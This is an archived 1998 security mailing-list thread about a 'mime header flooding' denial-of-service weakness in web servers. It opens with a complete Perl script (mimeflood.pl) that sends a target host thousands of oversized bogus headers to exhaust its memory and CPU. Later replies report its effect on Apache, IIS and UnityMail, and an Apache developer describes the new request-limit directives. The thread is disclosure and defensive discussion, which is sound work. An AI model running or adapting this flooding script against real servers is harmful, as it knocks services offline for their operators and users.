TUCoPS :: Web :: General :: mimeflod.txt

Many web servers allow you to consume large amounts of CPU and memory by flooding the server with the mime header.


[ http://www.rootshell.com/ ]

Date:         Thu, 3 Sep 1998 12:34:22 +0200
From:         Laurent FACQ <facq@U-BORDEAUX.FR>
Subject:      Web servers / possible DOS Attack / mime header flooding

#! /bin/perl

# mimeflood.pl - 02/08/1998 - L.Facq (facq@u-bordeaux.fr)

# Web servers / possible DOS Attack / "mime header flooding"
#
#       looking at the apache 1.2.5 source code i found
#       that there was no limit on how many mime headers could
#       be included in a client request. The only limits
#       are : 8192 byte for each header, 300 sec. on reading headers.
#
#       => by sending a crazy amount of 8000 bytes headers, it's possible
#       to consume a lot of memory (and of course CPU). The point
#       is that httpd daemons grow and STAY at this big size (or die
#       if you send too much)
#
#       -> may be a limit on mime header number could be added.
#
#       -> may be other web server could be vulnerable to this problem.
#
#       - i tried on an apache 1.2.5 -> it works
#       - i didnt installed 1.3.1 but looking at the source code,
#       i think the problem is there too.
#
##################################################
#From Roy T. Fielding / Sep 2 '98 at 12:57 pm -420
#
#[...]
#>
#>       -> may be a limit on mime header number could be added.
#
#Such limits have already been added to 1.3.2-dev.
#
#.....Roy

use Socket;

# Usage : $0 host [port [max] ]
$max= 0;
if ($ARGV[2])
{
    $max= $ARGV[2];
}

$proto = getprotobyname('tcp');
socket(Socket_Handle, PF_INET, SOCK_STREAM, $proto);
$port = 80;
if ($ARGV[1])
{
    $port= $ARGV[1];
}
$host = $ARGV[0];
$sin = sockaddr_in($port,inet_aton($host));

connect(Socket_Handle,$sin);
send Socket_Handle,"GET / HTTP/1.0\n",0;
$val= ('z'x8000)."\n";
$n= 1;
$|= 1;
while (Socket_Handle)
{
    send Socket_Handle,"Stupidheader$n: ",0;
    send Socket_Handle,$val,0;
    $n++;
    if (!($n % 100))
    {
        print "$n\n";
    }

    if ($max && ($n > $max))
    {
        last;
    }
}
print "Done: $n\n";
send Socket_Handle,"\n",0;

while (<Socket_Handle>)
{
    print $_;
}

--------------------------------------------------------------------------

Date:         Thu, 3 Sep 1998 15:58:55 -0400
From:         Vanja Hrustic <vanja@SIAMRELAY.COM>
Subject:      Re: Web servers / possible DOS Attack / mime header flooding

At 12:34 03/09/98 +0200, Laurent FACQ wrote:
>#       => by sending a crazy amount of 8000 bytes headers, it's possible
>#       to consume a lot of memory (and of course CPU). The point
>#       is that httpd daemons grow and STAY at this big size (or die
>#       if you send too much)

After 2000 headers, 1.3.1 was consuming 93% and stayed there (other
processes were consuming 7%). Script dies after 2800 and Apache goes back
to 0.05%. Couldn't crash it.

Tested on HP-UX 10.20 / Apache 1.3.1.


Vanja Hrustic
Information Systems Manager
Siam Relay Ltd.
http://www.siamrelay.com
vanja@siamrelay.com
Phone: +662-616-8628
Fax  : +662-272-6516

--------------------------------------------------------------------------

Date:         Thu, 3 Sep 1998 21:49:19 +0100
From:         Rich Wood <rich@DYNAMITE.ORG>
Subject:      Re: Web servers / possible DOS Attack / mime header flooding

On 3 Sep 98, at 12:34, Laurent FACQ wrote:
> #       => by sending a crazy amount of 8000 bytes headers, it's possible
> #       to consume a lot of memory (and of course CPU). The point
> #       is that httpd daemons grow and STAY at this big size (or die
> #       if you send too much)

Tried against apache 1.3.1 on FreeBSD 2.2.6 (DX2-66 16Mb), script hung
after 2500 headers with apache using 30Mb.

Tried against apache 1.3.1 on NT4 (workstation) SP3 (P200 64Mb), after
7500 headers, apache was using 120Mb RAM and the box ground to a halt.

It didn't actually crash apache on either box, but severely reduced the
usefulness of the systems.

Rich
--
Rich Wood
rich@dynamite.org

--------------------------------------------------------------------------

Date:         Fri, 4 Sep 1998 00:00:26 +0200
From:         Lars Eilebrecht <lars@APACHE.ORG>
Subject:      Re: Web servers / possible DOS Attack / mime header flooding

According to Laurent FACQ:

> # mimeflood.pl - 02/08/1998 - L.Facq (facq@u-bordeaux.fr)

This is generally a variant of the recently posted
Sioux DoS attack and if you have applied the patch
posted by Ben Laurie this 'mimeflood' script won't
harm your server in any way.

FYI, the next version of Apache will include the following new directives:

 - LimitRequestLine: limits the size of the request line
 - LimitRequestFields: limits the number of header lines
 - LimitRequestFieldsize: limits the size of each header line
 - LimitRequestBody: limits the size of the entity-body

Sensible default values are used if the directives are unset
which will prevent the server from beeing flooded with bogus requests...

[...]
> ##################################################
> #From Roy T. Fielding / Sep 2 '98 at 12:57 pm -420
> #
> #[...]
> #>
> #>       -> may be a limit on mime header number could be added.
> #
> #Such limits have already been added to 1.3.2-dev.
> #
> #.....Roy

Redistributing private email is considered to be very rude... or do you
have the permission from Roy to post his message?


Regards...
- --
Lars Eilebrecht
sfx@unix-ag.org
lars@apache.org

--------------------------------------------------------------------------

Date:         Thu, 3 Sep 1998 14:51:42 -0700
From:         Daniel Leeds <dleeds@DFACADES.COM>
Subject:      Re: Web servers / possible DOS Attack / mime header flooding

IIS on NT 4.0 sp3, and the stock windows 98 http server appear to be immune.

however some other 3rd party products appear vulnerable.

UnityMail 2.0 for 95/NT *IS* vulnerable to the DOS.  CPU load forks to 100%,
the system is useable, however all access to the UnityMail administrative
web server is hung.

The above is probably not a huge deal, other than annoying mailing list
admins who want to access their lists via the web admin, but i think its
probably illustrative of a wider scope---> how many other administrative web
interfaces, commercial http servers, etc are vulnerable to this denial of
service?


On 03-Sep-98
Rich Wood wrote:
> On 3 Sep 98, at 12:34, Laurent FACQ wrote:
>> #       => by sending a crazy amount of 8000 bytes headers, it's possible
>> #       to consume a lot of memory (and of course CPU). The point
>> #       is that httpd daemons grow and STAY at this big size (or die
>> #       if you send too much)
>
> Tried against apache 1.3.1 on FreeBSD 2.2.6 (DX2-66 16Mb), script hung
> after 2500 headers with apache using 30Mb.
>
> Tried against apache 1.3.1 on NT4 (workstation) SP3 (P200 64Mb), after
> 7500 headers, apache was using 120Mb RAM and the box ground to a halt.
>
> It didn't actually crash apache on either box, but severely reduced the
> usefulness of the systems.
>
> Rich
> --
> Rich Wood



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Daniel Leeds                          Systems Administrator
dleeds@dfacades.com                          DigitalFacades
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH